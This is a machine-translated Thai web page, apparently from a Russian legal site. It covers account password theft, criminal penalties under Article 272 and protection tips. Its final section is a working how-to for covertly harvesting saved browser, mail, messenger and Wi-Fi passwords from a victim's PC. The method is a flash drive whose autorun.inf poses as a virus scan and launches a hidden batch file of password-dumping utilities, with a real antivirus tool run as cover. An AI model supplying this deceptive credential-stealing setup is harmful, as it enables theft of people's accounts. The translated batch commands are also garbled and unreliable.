คอมพิวเตอร์ หน้าต่าง อินเทอร์เน็ต
ขยาย
บ้าน

วิธีขโมยชื่อผู้ใช้และรหัสผ่าน รหัสผ่านอีเมลถูกขโมยได้อย่างไร วิธีป้องกันตัวเองจากการขโมยรหัสผ่าน

ไม่ใช่ทุกคนที่รู้ว่าการขโมยรหัสผ่านบนโซเชียลเน็ตเวิร์กหรือแหล่งข้อมูลออนไลน์อื่นๆ เป็นความผิดทางอาญา การโจรกรรมดังกล่าวมีจริงเพียงใด ผู้กระทำความผิดสามารถรับโทษประเภทใดได้ และจะทำอย่างไรหากคุณตกเป็นเหยื่อ เราจะเล่าให้ฟังด้านล่างนี้

การขโมยรหัสผ่าน Vkontakte เป็นอย่างไร?

การครอบครองรหัสผ่าน VK นั้นค่อนข้างจริง การขโมยดังกล่าวอาจส่งผลเสียต่อเจ้าของบัญชี มีเรื่องราวมากมายบนอินเทอร์เน็ตเกี่ยวกับการที่บัญชีถูกแฮ็กเพื่อให้ได้ข้อมูลส่วนบุคคลหรือเผยแพร่ข้อมูลที่ทำให้เสื่อมเสียชื่อเสียงของเจ้าของ

การโจรกรรมทำได้หลายวิธี:

  • การใช้ฟิชชิ่ง: ผู้ใช้ถูกเปลี่ยนเส้นทางไปยังหน้าปลอมของไซต์ซึ่งเขาถูกขอให้ป้อนชื่อผู้ใช้และรหัสผ่าน ซึ่งผู้โจมตีจะเข้าควบคุม
  • โดยการเลือกชุดค่าผสม: วิธีนี้ใช้ได้ผลหากรหัสผ่านง่ายเกินไป
  • อันเป็นผลมาจากการกระทำฉ้อฉลในส่วนของคนรู้จักหรือคนแปลกหน้า (เมื่อการรวมกันถูกสอดแนมบนคอมพิวเตอร์หรือสมาร์ทโฟนโดยใช้ประโยชน์จากการไม่มีเจ้าของแกดเจ็ต)

บันทึก!

โดยไม่คำนึงถึงวิธีการดำเนินการของผู้โจมตี พวกเขามีโทษทางอาญา Corpus delicti ถูกสร้างขึ้นตามศิลปะ 272 แห่งประมวลกฎหมายอาญาของสหพันธรัฐรัสเซีย (การเข้าถึงข้อมูลคอมพิวเตอร์โดยผิดกฎหมาย)


จะทำอย่างไรถ้าคุณถูกแฮ็ค?

หากคุณตกเป็นเหยื่อของการแฮ็กบนโซเชียลเน็ตเวิร์ก Vkontakte หรืออื่น ๆ สิ่งแรกที่คุณต้องทำคือติดต่อฝ่ายบริการสนับสนุนเพื่อขอบล็อกบัญชีของคุณ คุณอาจต้องแสดงหลักฐานว่าคุณเป็นเจ้าของโปรไฟล์

หากรหัสผ่านที่ถูกขโมยถูกตั้งค่าไว้ที่อื่น ไม่ว่าจะเป็นโซเชียลเน็ตเวิร์ก อีเมล ฯลฯ จำเป็นต้องเปลี่ยนชุดค่าผสมในบริการอื่นๆ ทั้งหมด

บันทึก!

ผู้เชี่ยวชาญด้านความปลอดภัยของคอมพิวเตอร์ไม่แนะนำให้ตั้งรหัสผ่านเดียวกันในเว็บไซต์ต่างๆ เนื่องจากในกรณีเช่นนี้ ผู้โจมตีที่ครอบครองบัญชีหนึ่งสามารถเจาะบัญชีอื่นๆ ได้อย่างง่ายดาย

เพื่อน ญาติ และคนรู้จักทุกคนควรได้รับการเตือนว่าโปรไฟล์ของคุณถูกแฮ็ก ผู้โจมตีอาจพยายามส่งข้อความต่างๆ ในนามของคุณซึ่งมีลิงก์หรือคำร้องขอความช่วยเหลือที่เป็นอันตราย เพื่อนของคุณอาจเดือดร้อนหากหลงเชื่อและคลิกลิงก์หรือโอนเงินไปยังบัญชีหรือหมายเลขโทรศัพท์มือถือที่ระบุในข้อความ

หากคุณได้รับอันตรายร้ายแรงจากการกระทำของผู้กระทำความผิด คุณควรติดต่อหน่วยงานบังคับใช้กฎหมาย ในการทำเช่นนี้ คุณจะต้องเขียนคำให้การต่อตำรวจ ซึ่งควรมีคำร้องขอให้นำตัวผู้กระทำผิดเข้าสู่กระบวนการยุติธรรมภายใต้มาตรา 272 แห่งประมวลกฎหมายอาญาของสหพันธรัฐรัสเซีย ภายใต้บทความนี้ การเข้าถึงโดยไม่ได้รับอนุญาตจะถูกลงโทษทางอาญาก็ต่อเมื่อข้อมูลนั้น:

  • ทำลาย;
  • ถูกบล็อก;
  • แก้ไข;
  • คัดลอก

เมื่อพิจารณาถึงข้อเท็จจริงที่ว่าการปิดกั้นหมายถึงการขัดขวางการเข้าถึงข้อมูลโดยเจตนาโดยผู้ใช้ที่ถูกต้องตามกฎหมาย การขโมยรหัสผ่าน VK จึงอยู่ภายใต้การลงโทษของศิลปะ 272 แห่งประมวลกฎหมายอาญาของสหพันธรัฐรัสเซีย

สำหรับการกระทำดังกล่าวมีการกำหนดประเภทการลงโทษดังต่อไปนี้:

  • ปรับสูงถึง 200,000 รูเบิล (หรือในจำนวนเงินเดือนของผู้กระทำความผิดเป็นเวลา 18 เดือน)
  • แรงงานราชทัณฑ์นานถึง 1 ปี
  • การจำกัดเสรีภาพ การบังคับใช้แรงงาน หรือจำคุกไม่เกิน 2 ปี

เมื่อพิจารณาคดีแล้ว ศาลจะตัดสินว่าการลงโทษใดตามที่ระบุไว้ โดยจะขึ้นอยู่กับระดับของอันตรายที่เกิดกับเจ้าของบัญชีและบุคคลอื่น หากเกิดความเสียหายร้ายแรง (จำนวนมากกว่า 1,000,000 รูเบิล) ค่าปรับอาจเพิ่มขึ้นเป็น 300,000 รูเบิลและโทษจำคุก - สูงสุด 4 ปี

บันทึก!

ความเสียหายร้ายแรงอาจเกิดขึ้นในกรณีที่แฮ็กบัญชีของบริษัทการค้า ในสถานการณ์เช่นนี้ เราสามารถพูดคุยเกี่ยวกับการปกป้องชื่อเสียงทางธุรกิจที่ได้รับความเสียหายอันเป็นผลมาจากการกระทำของผู้บุกรุก

จะป้องกันตัวเองจากการขโมยรหัสผ่านได้อย่างไร?

มีกฎที่ชัดเจนและเข้าใจได้เกี่ยวกับการปฏิบัติตนเพื่อป้องกันตัวเองจากการโจรกรรม:

  • อย่าใช้ชุดค่าผสมที่เรียบง่ายเกินไป โดยเฉพาะชุดที่มีวันเกิด ชื่อและนามสกุล ฯลฯ พวกมันแตกง่ายมาก ถ้ารหัสผ่านจะประกอบด้วยชุดของตัวอักษรตัวเลขเครื่องหมายวรรคตอนหลายตัวที่ไม่ต่อเนื่องกัน
  • อย่าติดตามลิงก์ที่น่าสงสัย อย่าป้อนข้อมูลของคุณในเว็บไซต์ที่น่าสงสัย
  • อย่าบันทึกรหัสผ่านของคุณบนอุปกรณ์ที่ไม่คุ้นเคย หรือดีกว่านั้น อย่าบันทึกไว้ในเบราว์เซอร์เลย
  • พยายามอย่าลงชื่อเข้าใช้บัญชีของคุณจากเครือข่าย Wi-Fi สาธารณะ
  • ถ้าเป็นไปได้ ให้ใช้ห้องเก็บรหัสผ่านเช่น KeePass

หากคุณตกเป็นเหยื่อของผู้บุกรุก โปรดติดต่อทนายความของเราเพื่อขอความช่วยเหลือ พวกเขาจะช่วยเหลือในทุกขั้นตอนตั้งแต่ร่างและส่งคำให้การกับตำรวจและจบลงด้วยการพิจารณาคดี โทรหาเราหรือฝากข้อความของคุณบนเว็บไซต์

ขณะนี้ผู้ใช้ที่ไม่มีประสบการณ์จำนวนมากลงทะเบียนบน VKontakte.RU และ Odnoklassniki ซึ่งสามารถตกเป็นเหยื่อของผู้บุกรุกได้อย่างง่ายดาย 99% ของสิ่งที่เรียกว่า "แฮ็กเกอร์" ไม่ได้แฮ็กอะไรเลยจริงๆ นั่นคือ ไม่ได้ใช้ช่องโหว่บน VKontakte.RU หรือเมลของคุณ มีน้อยไม่เป็นที่รู้จักและผู้ที่พบพวกเขาได้รับค่าตอบแทนที่ดี ตามข่าวลือ Pavel Durov คนเดียวกันให้เงินหลายร้อยเหรียญสำหรับช่องโหว่ที่พบใน VKontakte.RU ดังนั้น อะไรคือวิธีทั่วไปในการ "แฮ็ก" บัญชี ขโมยรหัสผ่าน กล่องจดหมาย วิธีหลีกเลี่ยง และจะทำอย่างไรหากสิ่งนี้เกิดขึ้น


1. ฟิชชิ่งเก่าที่ดี

ฟิชชิ่ง (ฟิชชิ่งภาษาอังกฤษ เช่น การตกปลา - จับปลา) หมายถึงสิ่งต่อไปนี้: ไซต์ถูกสร้างขึ้นที่มีลักษณะเหมือนสำเนาของไซต์อื่นและมีที่อยู่ที่คล้ายกัน (เช่น vkontakte.ru)


ไม่ทางใดก็ทางหนึ่ง คุณถูกล่อลวงไปยังเว็บไซต์ปลอมนี้ และคุณป้อนรหัสผ่านของคุณที่นั่น ตัวอย่างเช่น คุณอาจได้รับจดหมายที่มีลักษณะเหมือนการแจ้งเตือนจาก VKontakte.ru เกี่ยวกับความคิดเห็นเกี่ยวกับรูปภาพของคุณ แต่ลิงก์ไปยังความคิดเห็นในจดหมายจะมีลักษณะดังนี้: http://vkontakte.ru/blablabla โปรดทราบว่าลิงก์นี้ไม่ได้นำไปสู่ที่ที่คุณคิด แต่นำไปสู่ ​​google.com คุณไปที่ไซต์ปลอมที่มีที่อยู่คล้ายกัน ใส่รหัสผ่านของคุณ คุณถูกเปลี่ยนเส้นทางไปยังไซต์จริง และรหัสผ่านยังคงอยู่กับผู้โจมตี
_______________________________________________________________
คุณธรรม: ก่อนป้อนรหัสผ่าน ให้ตรวจสอบที่อยู่ในแถบที่อยู่ของเบราว์เซอร์อย่างละเอียด มันควรจะพูดว่า vkontakte.ru ไม่ใช่ vkontatke.ru


_______________________________________________________________
2. จดหมายจากฝ่ายบริหาร

คุณได้รับจดหมายหรือข้อความจากฝ่ายบริหารทรัพยากร จดหมายแจ้งว่ามีข้อมูลสูญหายบนเซิร์ฟเวอร์ หรือกำลังตรวจสอบบัญชีอีกครั้ง หรืออย่างอื่น ดังนั้น คุณจะถูกขอให้ป้อนรหัสผ่านของคุณในแบบฟอร์มด้านล่างหรือส่งมาในอีเมลตอบกลับ ในขณะเดียวกันที่อยู่ของผู้ส่งก็เหมือนกับที่อยู่จริง ( [ป้องกันอีเมล]) หรือปลอมแปลง
_______________________________________________________________
คติสอนใจ: ไม่มีใครเคยขอรหัสผ่านของคุณในอีเมลหรือขอให้คุณป้อนรหัสผ่านที่ไหนสักแห่ง

_______________________________________________________________
3. "วางรหัสนี้ลงในแถบที่อยู่ของเบราว์เซอร์แล้วกด Enter"

ผู้โจมตีจะส่งโค้ดให้คุณซึ่งขึ้นต้นด้วย “javascript:document.write(”…) ขอให้คุณวางลงในแถบที่อยู่ของเบราว์เซอร์แล้วกด Enter


คำอธิบายอาจแตกต่างออกไป เช่น “บัญชีของคุณถูกสงสัยว่าส่งข้อความจำนวนมาก โปรดป้อนรหัสนี้เพื่อยืนยันว่าคุณไม่ใช่หุ่นยนต์... หรือข้อความจากเพื่อน: “มีฟีเจอร์เจ๋งๆ บนเว็บไซต์ วางโค้ดนี้ลงไป…” สามารถส่งข้อความในนามของเพื่อนของคุณที่บัญชีถูกขโมย


ประเด็นคือโค้ดนี้เป็นโปรแกรมขนาดเล็กของ JavaScript ที่ส่งคุกกี้ของคุณไปยังผู้โจมตี โปรแกรมนี้สามารถวางลงในแถบที่อยู่ของเบราว์เซอร์หรือในลิงค์
_______________________________________________________________
คติธรรม: หากคุณเห็น "javascript:" และข้อความยาวที่เข้าใจยาก อย่าคลิก


_______________________________________________________________
4. Open Secret ไม่ใช่คำถามลับที่เป็นความลับ

ในหลาย ๆ เว็บไซต์ รวมถึง ในอีเมล คุณสามารถกู้คืนรหัสผ่านได้หากคุณลืมรหัสผ่านโดยป้อนคำตอบสำหรับคำถามเพื่อความปลอดภัยของคุณ


ตัวอย่างของคำถามลับที่โชคร้ายมาก: "ทีมฟุตบอลโปรดของฉัน" - แก้ไขได้ด้วยการแจงนับตัวเลือกง่ายๆ “หมายเลขโทรศัพท์ที่ฉันชอบ”, “หมายเลขหนังสือเดินทางของฉัน”, “อาหารจานโปรดของฉัน” - คุณไม่คิดว่าข้อมูลนี้เป็นความลับใช่ไหม? ตอนนี้เด็กนักเรียนทุกคนสามารถค้นหาหมายเลขหนังสือเดินทางของคุณ สีรถของคุณ และเวลาที่คุณถูกควบคุมตัวครั้งล่าสุดเนื่องจากดื่มเครื่องดื่มในที่สาธารณะได้อย่างง่ายดาย


คุณสามารถขอคำตอบสำหรับคำถามอื่น ๆ จากเพื่อน ๆ ได้ซ้ำ ๆ เช่นการครอบครองบัญชี VKontakte ของคุณ: "มีบางอย่างที่ฉันสงสัยว่าบัญชีของคุณถูกแฮ็ก ตอนนี้ใจสลายกันทุกคน พิสูจน์ว่าคุณคือคุณ! บอกฉันทีว่าอาหารจานโปรดของฉันคืออะไร?
_______________________________________________________________
คุณธรรม: คำตอบสำหรับคำถามลับควรเป็นของคุณเท่านั้นที่รู้จริง ๆ และไม่มีใครอื่น แม้แต่แฟนของคุณ - ถ้าเขาต้องการอ่านจดหมายของคุณหรือแก้แค้นล่ะ? ความคิดที่ดีคือเขียนคำถามว่า "นามสกุลเดิมของแม่ของฉันคืออะไร" และคำตอบคือ "สิบสองล้านสี่หมื่นสองพัน"


_______________________________________________________________
5. คอมพิวเตอร์ของฉันคือวิมานของฉัน

ไม่ควรมีใครเข้าถึงคอมพิวเตอร์ของคุณได้ ตั้งรหัสผ่านใน BIOS เพื่อเปิดคอมพิวเตอร์ เพื่อเข้าสู่บัญชี Windows ของคุณ สร้างบัญชี "Guest" แยกต่างหากโดยมีสิทธิ์ที่จำกัดมากและมอบให้กับผู้ที่ต้องการนั่งที่คอมพิวเตอร์ของคุณ


หากต้องการขโมยรหัสผ่านของคุณ เพียงแค่ดูในเบราว์เซอร์ (ใน Firefox ในหน้าต่างการตั้งค่า คุณจะเห็นรหัสผ่านที่บันทึกไว้ทั้งหมด) หรือคุณสามารถเรียกใช้โปรแกรมจากแฟลชไดรฟ์ซึ่งในไม่กี่วินาทีจะรวบรวมรหัสผ่านทั้งหมดที่อยู่ในคอมพิวเตอร์ของคุณ
_______________________________________________________________
คุณธรรม: อย่าให้ใครเข้าไปในคอมพิวเตอร์และถ้าคุณปล่อยให้มันเป็น "แขก" เท่านั้น แม้ว่าคุณจะถอยห่างสักนาที ให้กดปุ่ม Win + L เพื่อล็อคหน้าจอ ก่อนนำคอมพิวเตอร์ของคุณไปตั้งค่าหรือซ่อมแซม ให้ลบรหัสผ่านที่บันทึกไว้ ใช้อีเมลของ Google - ที่ด้านล่างของหน้ามีลิงก์ "กิจกรรมบัญชีล่าสุด" ซึ่งคุณสามารถดูว่าใครเข้ามาที่อีเมลของคุณเมื่อใดและจากที่ใด


_______________________________________________________________
6. ล้างมือให้สะอาดหลังการใช้ห้องน้ำ.

หากคุณใช้อินเทอร์เน็ตที่ร้านอินเทอร์เน็ตคาเฟ่หรือกับเพื่อน อย่าลืมเปลี่ยนรหัสผ่านและคำถามลับทันทีที่คุณเข้าถึงอินเทอร์เน็ตที่ปลอดภัยได้


เมื่อเข้าสู่อีเมลของ Google อย่าเขียน http://mail.google.com แต่เป็น https://mail.google.com - รหัสผ่านจะถูกส่งในรูปแบบเข้ารหัส แต่สิ่งนี้ไม่ได้ช่วยให้คุณประหยัดจากโปรแกรมที่บันทึกการกดแป้นพิมพ์ทั้งหมดอย่างรอบคอบ (ที่เรียกว่า "คีย์ล็อกเกอร์" ตัวอย่างเช่น Punto Switcher ที่ดูเหมือนไม่เป็นอันตราย)


โปรดจำไว้ว่าคนที่ทำงานในร้านอินเทอร์เน็ตคาเฟ่มักจะเหงา และคนที่ใช้คอมพิวเตอร์แบบสังคมนิยมที่อ่านจดหมายของคนอื่นหรือสนุกสนานแทนคนอื่นเป็นหนึ่งในความบันเทิงไม่กี่อย่างในชีวิต ดังนั้นพวกเขายินดีที่จะรับรหัสผ่านของคุณ
_______________________________________________________________
คติสอนใจ: หากคุณเปิดเผยรหัสผ่านในที่สาธารณะ ให้เปลี่ยนรหัสผ่านทันทีที่คุณเข้าถึงอินเทอร์เน็ตที่ปลอดภัยได้ กลัวคอมพิวเตอร์สาธารณะและแฟลชไดรฟ์ที่อยู่ในนั้น


_______________________________________________________________
7. ฟรีไวไฟ. กับดักหนูฟรี

ด้วยการตั้งค่าจุดเชื่อมต่ออินเทอร์เน็ตไร้สาย (Wi-Fi) ฟรี โดยเฉพาะอย่างยิ่งในสถานที่ยอดนิยมหรือมีประชากรหนาแน่น คุณสามารถรวบรวมรหัสผ่านจำนวนมากได้อย่างรวดเร็วสำหรับผู้ที่ใช้ freebie นี้ เช่นเดียวกับเครือข่าย Tor ที่ไม่ระบุชื่อ (หากคุณไม่รู้ว่ามันคืออะไร อย่าทำอย่างนั้น)
_______________________________________________________________
คติธรรม: กฎเหมือนกับอินเทอร์เน็ตคาเฟ่: เปลี่ยนรหัสผ่านของคุณโดยเร็วที่สุด


_______________________________________________________________
8. เครือข่ายการแชร์ไฟล์

เมื่อคุณติดตั้งโปรแกรมแชร์ไฟล์ เช่น eMule หรือ DC++ ระบบจะขอให้คุณระบุโฟลเดอร์ที่จะแชร์กับสมาชิกคนอื่นๆ คุณต้องระบุโฟลเดอร์ที่มีเพลงและภาพยนตร์ แต่คุณมีพื้นที่จัดเก็บไฟล์ขนาดใหญ่ในคอมพิวเตอร์ของคุณ และคุณขี้เกียจเกินไปที่จะเลือกโฟลเดอร์ทั้งหมด ดังนั้นคุณเพียงแค่ตรวจสอบไดรฟ์ C: และทำให้พร้อมใช้งานบนอินเทอร์เน็ตทั้งหมด


เรียกใช้โปรแกรมแบ่งปันไฟล์ค้นหาเช่น wand.dat - และคุณสามารถดาวน์โหลดไฟล์ที่เก็บรหัสผ่านของผู้ใช้ที่ประมาท พวกเขาถูกถอดรหัสโดยโปรแกรม unwand.exe
_______________________________________________________________
คติประจำใจ: เมื่อใช้เครือข่ายการแชร์ไฟล์ ให้กำหนดให้แต่ละโฟลเดอร์เป็นสาธารณะเท่านั้น ไม่ใช่ทั้งไดรฟ์


_______________________________________________________________
9. หากเพจของคุณถูกซ่อน ไม่ได้หมายความว่าจะไม่มีใครเห็นรูปภาพและบันทึกย่อของคุณ

แม้ว่าคุณจะซ่อนเพจของคุณบน vkontakte.ru จากการสอดรู้สอดเห็นโดยตั้งค่าการเข้าถึงเป็น "เพื่อนเท่านั้น" หรือ "ไม่แสดงให้ใครเห็น ลบเพจ" เลย อัลบั้มรูป บันทึกย่อ เพื่อน กลุ่ม แอปพลิเคชัน ฯลฯ ทั้งหมดของคุณยังคงสามารถดูได้ (ยังไงก็ตาม มันสะดวกที่จะทำเช่นนี้โดยใช้เบราว์เซอร์ Firefox ที่มีโปรแกรมเสริม Greasemonkey และสคริปต์ vkPatch » http://vkontakte.ru/topic12969729)


การแสดงรายชื่อเพื่อนของคุณต่อทุกคนเป็นสิ่งที่อันตรายอย่างยิ่ง ผู้โจมตีสามารถใช้สิ่งนี้เพื่อหลอกล่อข้อมูล เงิน ค้นหาข้อมูลของคุณ ฯลฯ
_______________________________________________________________
คุณธรรม: ในการตั้งค่าของแต่ละอัลบั้มให้ตั้งค่า "สำหรับเพื่อนเท่านั้น" ในการตั้งค่าความเป็นส่วนตัวทั่วไป - อย่าแสดงรายชื่อเพื่อนให้ใครเห็น


_______________________________________________________________
10. หากคุณมีอีเมลหลายฉบับ อย่าใช้คุณลักษณะ "ที่อยู่สำรองของฉัน"

ตัวอย่าง: ในการตั้งค่าของอีเมลหนึ่ง คุณระบุอีเมลอื่นของคุณ เมื่อครอบครองกล่องที่ 1 แล้ว ผู้โจมตีคลิก "ฉันลืมรหัสผ่าน" ในกล่องที่ 2 เพื่อรับลิงก์ไปยังกล่องแรกเพื่อเปลี่ยนรหัสผ่านเป็นกล่องที่สอง
_______________________________________________________________
คุณธรรม: อย่าป้อนที่อยู่เพิ่มเติม ในอีเมล Yandex ให้ระบุโทรศัพท์มือถือของคุณในการตั้งค่าจากนั้นผู้โจมตีแม้จะรู้คำตอบที่ถูกต้องสำหรับคำถามลับก็จะไม่มีอำนาจ - Yandex จะส่งรหัสกู้คืนให้คุณในรูปแบบ SMS


_______________________________________________________________
จะทำอย่างไรถ้ารหัสผ่านจาก vkontakte.ru หรือเมลยังคงถูกขโมย?

1. อย่าให้อาหารโทรล อย่าสื่อสารกับผู้โจมตีอย่าเขียนคำขู่และจดหมายโกรธ - สิ่งนี้จะกระตุ้นให้เขามากยิ่งขึ้น


2. แจ้งให้เพื่อนและญาติของคุณทราบทันทีว่าบัญชีของคุณถูกบุกรุก ผู้โจมตีที่ใช้ข้อมูลของคุณ สามารถหลอกลวงคนที่คุณรัก ยืมเงินจากพวกเขาหรือขอให้เติมเงินในบัญชีแทนคุณ โทรหาพ่อแม่และบอกว่ามีบางอย่างเกิดขึ้นกับคุณและคุณต้องจ่ายเงินด่วน ฯลฯ สิ่งเหล่านี้ไม่ใช่เรื่องตลก เพื่อนของคุณอาจเดือดร้อนอย่างหนัก


3. หากคุณเห็นว่าบัญชีของเพื่อนคุณถูกขโมย ให้ลบออกจากเพื่อน เพื่อไม่ให้ผู้โจมตีเข้าถึงโทรศัพท์และข้อมูลอื่นๆ บนเพจของคุณ


แน่นอนว่าเป็นที่ชัดเจนว่าคอมพิวเตอร์ของคุณไม่ควรมีไวรัสและรหัสผ่านของคุณไม่ควรมีอักขระ 6-7 ตัว - อย่างน้อย 10 ตัว โดยเฉพาะอย่างยิ่ง 12-14 ตัวเลข ตัวอักษรและเครื่องหมาย (จำเป็น มิฉะนั้นจะง่ายต่อการถอดรหัส / รับ!)


และจำไว้ว่า: เพียงเพราะคุณไม่หวาดระแวงไม่ได้หมายความว่าคุณจะไม่ถูกติดตาม หากคุณคิดว่าไม่มีใครต้องการรหัสผ่านและข้อมูลของคุณ แสดงว่าคุณคิดผิดอย่างแรง

วัสดุจากเว็บไซต์ http://narkoseti.ru



จริงติดคุก!

ลองหาวิธีขโมยรหัสผ่านจากคอมพิวเตอร์หากคุณสามารถเข้าถึงได้ แต่เพื่อไม่ให้เหยื่อสงสัยอะไรเลย

วิธีหนึ่งคือสร้างแฟลชไดรฟ์พิเศษพร้อมยูทิลิตี้ที่สามารถแยกรหัสผ่านจากเบราว์เซอร์และโปรแกรมอื่น ๆ ที่จัดเก็บรหัสผ่านเพื่อความสะดวกของผู้ใช้

ดาวน์โหลดยูทิลิตีการกู้คืนรหัสผ่านที่เราต้องการ:

* MessenPass - กู้คืนรหัสผ่านสำหรับโปรแกรมส่งข้อความโต้ตอบแบบทันทียอดนิยม: MSN Messenger, Windows Messenger (ใน Windows XP), Windows Live Messenger (ใน Windows XP และ Vista), Yahoo Messenger (เวอร์ชัน 5.x/6.x), ICQ Lite 4.x/5.x/2003, AOL Instant Messenger, AIM 6.x, AIM Pro, Trillian, Miranda และ GAIM;

* Mail PassView - ดึงรหัสผ่านที่บันทึกไว้จากไคลเอนต์อีเมล: Outlook Express, Microsoft Outlook 2000 (บัญชี POP3/SMTP เท่านั้น), Microsoft Outlook 2002/2003/2007, Windows Mail, IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free และบัญชีอีเมลบนเว็บ

* IE Passview - แสดงการเข้าสู่ระบบและรหัสผ่านที่บันทึกโดย "donkey";

* ChromePass - แสดงการเข้าสู่ระบบและรหัสผ่านที่บันทึกโดยเบราว์เซอร์ Google Chrome

* PasswordFox - รับรหัสผ่านทั้งหมดที่ Firefox บันทึกไว้";

* Protected Storage PassView - กู้คืนรหัสผ่านทั้งหมดที่จัดเก็บไว้ในที่จัดเก็บข้อมูลที่ปลอดภัย

* Dialupass - ดึงรหัสผ่านทั้งหมดของเซสชันการเรียกเลขหมาย/VPN

* การกู้คืนรหัสผ่านเครือข่าย - แสดงรหัสผ่านที่คุณใช้สำหรับการแบ่งปันในเครือข่ายท้องถิ่นรวมถึงรหัสผ่านของบัญชี .NET Passport/Messenger

* PstPassword - แยกรหัสผ่านจากไฟล์โฟลเดอร์ส่วนบุคคลของ Outlook - .PST;

* WirelessKeyView - ดึงคีย์เครือข่ายไร้สายทั้งหมด (WEP/WPA) ที่จัดเก็บไว้ในคอมพิวเตอร์ของคุณ

นอกจากนี้ยังมียูทิลิตี้ OperaPassView แต่ยังไม่รองรับบรรทัดคำสั่ง ดังนั้นเราจึงไม่รวมไว้ในชุดของเรา
สาธารณูปโภคครบครัน

เราต้องการยูทิลิตี้ Hidden Start ()

เราจะดาวน์โหลดเพื่อปกปิดยูทิลิตี้ของเราด้วย เราจะเรียกใช้เมื่อสิ้นสุดการดำเนินการแฮ็ครหัสผ่าน และมีเพียงผลงานของเขาเท่านั้นที่จะเห็นเหยื่อบนหน้าจอของเขา

กำลังเตรียมแฟลช

1. สร้างสองโฟลเดอร์ในแฟลชไดรฟ์:
แฟลชไดรฟ์:\prog\
แฟลชไดรฟ์:\prog\log\

2. ในโฟลเดอร์แฟลชไดรฟ์: \ prog \ กรอกไฟล์ปฏิบัติการทั้งหมด - ยูทิลิตี้, hstart.exe, KK.exe

3. ที่รูทของแฟลชไดรฟ์ ให้สร้าง autorun.inf โดยมีเนื้อหาต่อไปนี้:


open=prog/hstart /NOCONSOLE "launch.bat"
ACTION= สแกนคอมพิวเตอร์เพื่อหาไวรัส


การดำเนินการในที่นี้คือปุ่มที่จะแสดงในหน้าต่างการเลือกการดำเนินการเมื่อเชื่อมต่อแฟลชไดรฟ์ และเปิดคือคำสั่งที่จะดำเนินการเมื่อเลือกการดำเนินการนี้ คำสั่งนี้รวมถึงการรันแบตช์ไฟล์ในโหมดซ่อนโดยใช้ยูทิลิตี้ Hidden Start

4. สร้างแบตช์ไฟล์ launch.bat:

ปิดเสียงสะท้อน
echo %computername%\%username% bte% %time% >> prog/log/_log.txt
เริ่ม prog/ChromePass.exe /stext prog/log/%computername%_chrom.txt
เริ่ม prog/Dialupass.exe /stext prog/log/%computername%_dialupass.txt
เริ่ม prog/iepv.exe /stext prog/log/%computername%_iepv.txt
เริ่ม prog/mailpv.exe /stext prog/log/%computername%_mailpv.txt
เริ่ม prog/mspass.exe /stext prog/log/%computername%_mspass.txt
เริ่ม prog/netpass.exe /stext prog/log/%computername%_netpass.txt
เริ่ม prog/pspv.exe /stext prog/log/%computername%_pspv.txt
เริ่ม prog/PstPassword.exe /stext prog/log/%computername%_pstpassword.txt
เริ่ม prog/WirelessKeyView.exe /stext prog/log/%computername%_wirelesskeyview.txt

ถ้าไม่มี "%programfiles%\Mozilla Firefox\" ไปที่จุดสิ้นสุด
เริ่ม prog/PasswordFox.exe /stext prog/log/%computername%_passwordfox.txt
:จบ
startprog/KK.exe

พิจารณาคำสั่งของแบตช์ไฟล์โดยละเอียด:

echo off - ห้ามส่งออกไปยังหน้าต่าง CMD ของผลการดำเนินการ

echo %computername%\%username% Ъte% %time% >> prog/log/_log.txt - เขียนชื่อคอมพิวเตอร์ ชื่อผู้ใช้ วันที่และเวลา ไปยังไฟล์ prog/log/_log.txt

start prog/ChromePass.exe /stext prog/log/%computername%_chrom.txt - เรียกใช้ยูทิลิตี ChromePass.exe ซึ่งเมื่อดำเนินการแล้ว ควรบันทึกรหัสผ่านลงในไฟล์ prog/log/computername_chrom.txt

เช่นเดียวกับยูทิลิตี้อื่นๆ ข้อสังเกตประการเดียวคือก่อนที่จะเรียกใช้ PasswordFox.exe เราจะตรวจสอบว่ามีการติดตั้ง FF ในคอมพิวเตอร์ของเหยื่อหรือไม่ หากไม่ได้ติดตั้ง FF ยูทิลิตี PasswordFox.exe จะแสดงข้อความแสดงข้อผิดพลาด

start prog/KK.exe - เราปิดบังการกระทำของเราโดยการเรียกใช้ยูทิลิตี้จริงเพื่อลบเวิร์ม Net-Worm.Win32.Kido ออกจาก Kaspersky Lab

ทุกอย่าง - แฟลชไดรฟ์พร้อมแล้ว ตอนนี้ผู้โจมตีเพียงแค่เชื่อมต่อแฟลชไดรฟ์เข้ากับคอมพิวเตอร์ของเหยื่อ และเลือก "สแกนคอมพิวเตอร์เพื่อหาไวรัส" ในหน้าต่างป๊อปอัปที่ปรากฏขึ้นเพื่อแยกรหัสผ่านที่บันทึกไว้ทั้งหมดในคอมพิวเตอร์เครื่องนี้ เหตุผลในการเรียกใช้ "การสแกนไวรัส" นั้นค่อนข้างง่าย โดยเฉพาะอย่างยิ่งหากเหยื่อเชื่อใจคุณ

สู้ยังไง?

1. อย่าบันทึกรหัสผ่าน - ควรใช้โปรแกรมบางอย่างเช่น Password Keeper หรือ eWallet

3. จำเป็นต้องมีโปรแกรมป้องกันไวรัสปกติ! แม้ว่าเขาจะสาบานเพียงไม่กี่ของยูทิลิตี้เหล่านี้

เหตุผลในการเขียนบทความนี้คือข้อความในนิตยสาร "Hacker"

บทความนี้เขียนขึ้นเพื่อให้ข้อมูลเท่านั้น
จุดประสงค์คือเพื่อปกป้องข้อมูลของคุณจากผู้บุกรุก
ใครรู้ตัวมีอาวุธ!

การขโมยรหัสผ่านของผู้อื่นมีความรับผิดทางอาญาภายใต้ส่วนที่ 1 ของศิลปะ 272 แห่งประมวลกฎหมายอาญาของสหพันธรัฐรัสเซีย "การเข้าถึงข้อมูลคอมพิวเตอร์โดยผิดกฎหมาย" และคุกคาม จริงติดคุก!

